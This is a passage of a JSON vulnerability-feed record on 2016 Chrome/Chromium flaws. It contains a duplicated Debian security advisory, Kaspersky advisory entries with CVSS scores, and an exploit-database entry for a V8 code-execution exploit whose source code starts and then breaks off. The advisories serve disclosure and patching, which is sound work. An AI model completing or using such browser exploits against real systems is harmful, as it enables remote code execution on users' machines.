library.\n\nCVE-2016-5207\n\n Mariusz Mlynski discovered a cross-site scripting issue.\n\nCVE-2016-5208\n\n Mariusz Mlynski discovered another cross-site scripting issue.\n\nCVE-2016-5209\n\n Giwan Go discovered an out-of-bounds write issue in Blink/Webkit.\n\nCVE-2016-5210\n\n Ke Liu discovered an out-of-bounds write in the pdfium library.\n\nCVE-2016-5211\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5212\n\n Khalil Zhani discovered an information disclosure issue in the\n developer tools.\n\nCVE-2016-5213\n\n Khalil Zhani discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2016-5214\n\n Jonathan Birch discovered a file download protection bypass.\n\nCVE-2016-5215\n\n Looben Yang discovered a use-after-free issue.\n\nCVE-2016-5216\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5217\n\n Rob Wu discovered a condition where data was not validated by\n the pdfium library.\n\nCVE-2016-5218\n\n Abdulrahman Alqabandi discovered a URL spoofing issue.\n\nCVE-2016-5219\n\n Rob Wu discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2016-5220\n\n Rob Wu discovered a way to access files on the local system.\n\nCVE-2016-5221\n\n Tim Becker discovered an integer overflow issue in the angle\n library.\n\nCVE-2016-5222\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-5223\n\n Hwiwon Lee discovered an integer overflow issue in the pdfium\n library.\n\nCVE-2016-5224\n\n Roeland Krak discovered a same-origin bypass in SVG image handling.\n\nCVE-2016-5225\n\n Scott Helme discovered a Content Security Protection bypass.\n\nCVE-2016-5226\n\n Jun Kokatsu discovered a cross-scripting issue.\n\nCVE-2016-9650\n\n Jakub \u00c5\u00bboczek discovered a Content Security Protection information\n disclosure.\n\nCVE-2016-9651\n\n Guang Gong discovered a way to access private data in the v8\n javascript library.\n\nCVE-2016-9652\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 55.0.2883.75-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 55.0.2883.75-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-11T20:59:42", "type": "debian", "title": "[SECURITY] [DSA 3731-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194", "CVE-2016-5198", "CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-11T20:59:42", "id": "DEBIAN:DSA-3731-1:02966", "href": "https://lists.debian.org/debian-security-announce/2016/msg00314.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:10:54", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3731-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nDecember 11, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2016-5181 CVE-2016-5182 CVE-2016-5183 CVE-2016-5184\n CVE-2016-5185 CVE-2016-5186 CVE-2016-5187 CVE-2016-5188\n CVE-2016-5189 CVE-2016-5190 CVE-2016-5191 CVE-2016-5192\n CVE-2016-5193 CVE-2016-5194 CVE-2016-5198 CVE-2016-5199\n CVE-2016-5200 CVE-2016-5201 CVE-2016-5202 CVE-2016-5203\n CVE-2016-5204 CVE-2016-5205 CVE-2016-5206 CVE-2016-5207\n CVE-2016-5208 CVE-2016-5209 CVE-2016-5210 CVE-2016-5211\n CVE-2016-5212 CVE-2016-5213 CVE-2016-5214 CVE-2016-5215\n CVE-2016-5216 CVE-2016-5217 CVE-2016-5218 CVE-2016-5219\n CVE-2016-5220 CVE-2016-5221 CVE-2016-5222 CVE-2016-5223\n CVE-2016-5224 CVE-2016-5225 CVE-2016-5226 CVE-2016-9650\n CVE-2016-9651 CVE-2016-9652\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2016-5181\n\n A cross-site scripting issue was discovered.\n\nCVE-2016-5182\n\n Giwan Go discovered a heap overflow issue.\n\nCVE-2016-5183\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184\n\n Another use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185\n\n cloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186\n\n Abdulrahman Alqabandi discovered an out-of-bounds read issue in the\n developer tools.\n\nCVE-2016-5187\n\n Luan Herrera discovered a URL spoofing issue.\n\nCVE-2016-5188\n\n Luan Herrera discovered that some drop down menus can be used to\n hide parts of the user interface.\n\nCVE-2016-5189\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-5190\n\n Atte Kettunen discovered a use-after-free issue.\n\nCVE-2016-5191\n\n Gareth Hughes discovered a cross-site scripting issue.\n\nCVE-2016-5192\n\n haojunhou@gmail.com discovered a same-origin bypass.\n\nCVE-2016-5193\n\n Yuyang Zhou discovered a way to pop open a new window.\n\nCVE-2016-5194\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-5198\n\n Tencent Keen Security Lab discovered an out-of-bounds memory access\n issue in the v8 javascript library.\n\nCVE-2016-5199\n\n A heap corruption issue was discovered in the ffmpeg library.\n\nCVE-2016-5200\n\n Choongwoo Han discovered an out-of-bounds memory access issue in\n the v8 javascript library.\n\nCVE-2016-5201\n\n Rob Wu discovered an information leak.\n\nCVE-2016-5202\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-5203\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5204\n\n Mariusz Mlynski discovered a cross-site scripting issue in SVG\n image handling.\n\nCVE-2016-5205\n\n A cross-site scripting issue was discovered.\n\nCVE-2016-5206\n\n Rob Wu discovered a same-origin bypass in the pdfium library.\n\nCVE-2016-5207\n\n Mariusz Mlynski discovered a cross-site scripting issue.\n\nCVE-2016-5208\n\n Mariusz Mlynski discovered another cross-site scripting issue.\n\nCVE-2016-5209\n\n Giwan Go discovered an out-of-bounds write issue in Blink/Webkit.\n\nCVE-2016-5210\n\n Ke Liu discovered an out-of-bounds write in the pdfium library.\n\nCVE-2016-5211\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5212\n\n Khalil Zhani discovered an information disclosure issue in the\n developer tools.\n\nCVE-2016-5213\n\n Khalil Zhani discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2016-5214\n\n Jonathan Birch discovered a file download protection bypass.\n\nCVE-2016-5215\n\n Looben Yang discovered a use-after-free issue.\n\nCVE-2016-5216\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5217\n\n Rob Wu discovered a condition where data was not validated by\n the pdfium library.\n\nCVE-2016-5218\n\n Abdulrahman Alqabandi discovered a URL spoofing issue.\n\nCVE-2016-5219\n\n Rob Wu discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2016-5220\n\n Rob Wu discovered a way to access files on the local system.\n\nCVE-2016-5221\n\n Tim Becker discovered an integer overflow issue in the angle\n library.\n\nCVE-2016-5222\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-5223\n\n Hwiwon Lee discovered an integer overflow issue in the pdfium\n library.\n\nCVE-2016-5224\n\n Roeland Krak discovered a same-origin bypass in SVG image handling.\n\nCVE-2016-5225\n\n Scott Helme discovered a Content Security Protection bypass.\n\nCVE-2016-5226\n\n Jun Kokatsu discovered a cross-scripting issue.\n\nCVE-2016-9650\n\n Jakub \u00c5\u00bboczek discovered a Content Security Protection information\n disclosure.\n\nCVE-2016-9651\n\n Guang Gong discovered a way to access private data in the v8\n javascript library.\n\nCVE-2016-9652\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 55.0.2883.75-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 55.0.2883.75-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-11T20:59:42", "type": "debian", "title": "[SECURITY] [DSA 3731-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194", "CVE-2016-5198", "CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-11T20:59:42", "id": "DEBIAN:DSA-3731-1:1ECEF", "href": "https://lists.debian.org/debian-security-announce/2016/msg00314.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:19:00", "description": "### *Detect date*:\n01/19/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome prior to 55.0.2883.75. Malicious users can exploit these vulnerabilities to bypass security restrictions, make code injections and possibly cause denial of service, obtain sensitive information.\n\n### *Affected products*:\nGoogle Chrome earlier than 55.0.2883.75 (all branches)\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2016/12/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2016-5205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5205>)4.3Warning \n[CVE-2016-5204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5204>)4.3Warning \n[CVE-2016-5203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5203>)6.8High \n[CVE-2016-9650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9650>)4.3Warning", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-19T00:00:00", "type": "kaspersky", "title": "KLA10949 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-9650"], "modified": "2020-06-03T00:00:00", "id": "KLA10949", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10949/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:18:59", "description": "### *Detect date*:\n01/19/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome earlier than 54.0.2840.99. Malicious users can exploit these vulnerabilities to make privilege escalation, possibly cause denial of service, obtain sensitive information.\n\n### *Affected products*:\nGoogle Chrome earlier than 54.0.2840.99 for Windows\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2016/11/stable-channel-update-for-desktop_9.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2016-5199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5199>)6.8High \n[CVE-2016-5200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5200>)6.8High \n[CVE-2016-5201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5201>)4.3Warning", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-19T00:00:00", "type": "kaspersky", "title": "KLA10950 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201"], "modified": "2020-06-03T00:00:00", "id": "KLA10950", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10950/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:19:46", "description": "### *Detect date*:\n11/09/2016\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 54.0.2840.99 (Windows) \nGoogle Chrome versions earlier than 54.0.2840.98 (OS X)\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Google Chrome releases blog](<http://feedproxy.google.com/~r/GoogleChromeReleases/~3/axFuGbKmupg/stable-channel-update-for-desktop_9.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2016-5199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5199>)6.8High \n[CVE-2016-5200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5200>)6.8High \n[CVE-2016-5201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5201>)4.3Warning", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-09T00:00:00", "type": "kaspersky", "title": "KLA10903 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201"], "modified": "2020-06-03T00:00:00", "id": "KLA10903", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10903/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:20:03", "description": "### *Detect date*:\n10/12/2016\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to bypass security restrictions, conduct XSS attack, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 54.0.2840.59 (All branches)\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Google Chrome releases blog entry](<https://googlechromereleases.blogspot.ru/2016/10/stable-channel-update-for-desktop.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\$Google+Chrome+Releases\$>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2016-5193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5193>)4.3Warning \n[CVE-2016-5192](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5192>)4.3Warning \n[CVE-2016-5191](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5191>)4.3Warning \n[CVE-2016-5190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5190>)6.8High \n[CVE-2016-5189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5189>)4.3Warning \n[CVE-2016-5187](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5187>)4.3Warning \n[CVE-2016-5186](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5186>)6.8High \n[CVE-2016-5185](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5185>)6.8High \n[CVE-2016-5184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5184>)6.8High \n[CVE-2016-5183](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5183>)6.8High \n[CVE-2016-5182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5182>)6.8High \n[CVE-2016-5181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5181>)4.3Warning", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-12T00:00:00", "type": "kaspersky", "title": "KLA10886 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193"], "modified": "2020-06-03T00:00:00", "id": "KLA10886", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10886/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:19:35", "description": "### *Detect date*:\n12/17/2016\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome prior to 54.0.2840.59. Malicious users can exploit these vulnerabilities to bypass security restrictions, spoof user interface, inject code or possibly cause denial of service.\n\n### *Affected products*:\nGoogle Chrome prior to 54.0.2840.59 (all branches)\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Download Google Chrome](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2016/10/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2016-5193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5193>)4.3Warning \n[CVE-2016-5192](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5192>)4.3Warning \n[CVE-2016-5191](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5191>)4.3Warning \n[CVE-2016-5190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5190>)6.8High \n[CVE-2016-5189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5189>)4.3Warning \n[CVE-2016-5188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5188>)4.3Warning \n[CVE-2016-5187](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5187>)4.3Warning \n[CVE-2016-5186](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5186>)6.8High \n[CVE-2016-5185](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5185>)6.8High \n[CVE-2016-5184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5184>)6.8High \n[CVE-2016-5183](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5183>)6.8High \n[CVE-2016-5182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5182>)6.8High \n[CVE-2016-5181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5181>)4.3Warning", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-17T00:00:00", "type": "kaspersky", "title": "KLA10914 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193"], "modified": "2020-06-03T00:00:00", "id": "KLA10914", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10914/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-09T13:37:24", "description": "Exploit for Android platform in category remote exploits", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "zdt", "title": "Google Chrome - V8 Private Property Arbitrary Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9651"], "modified": "2017-06-14T00:00:00", "id": "1337DAY-ID-27954", "href": "https://0day.today/exploit/description/27954", "sourceData": "<html>\r\n// Source: https://github.com/secmob/pwnfest2016/\r\n<script>\r\nfunction exploit(){\r\n \r\nfunction to_hex(num){\r\n return (num>>>0).toString(16);\r\n}\r\nfunction 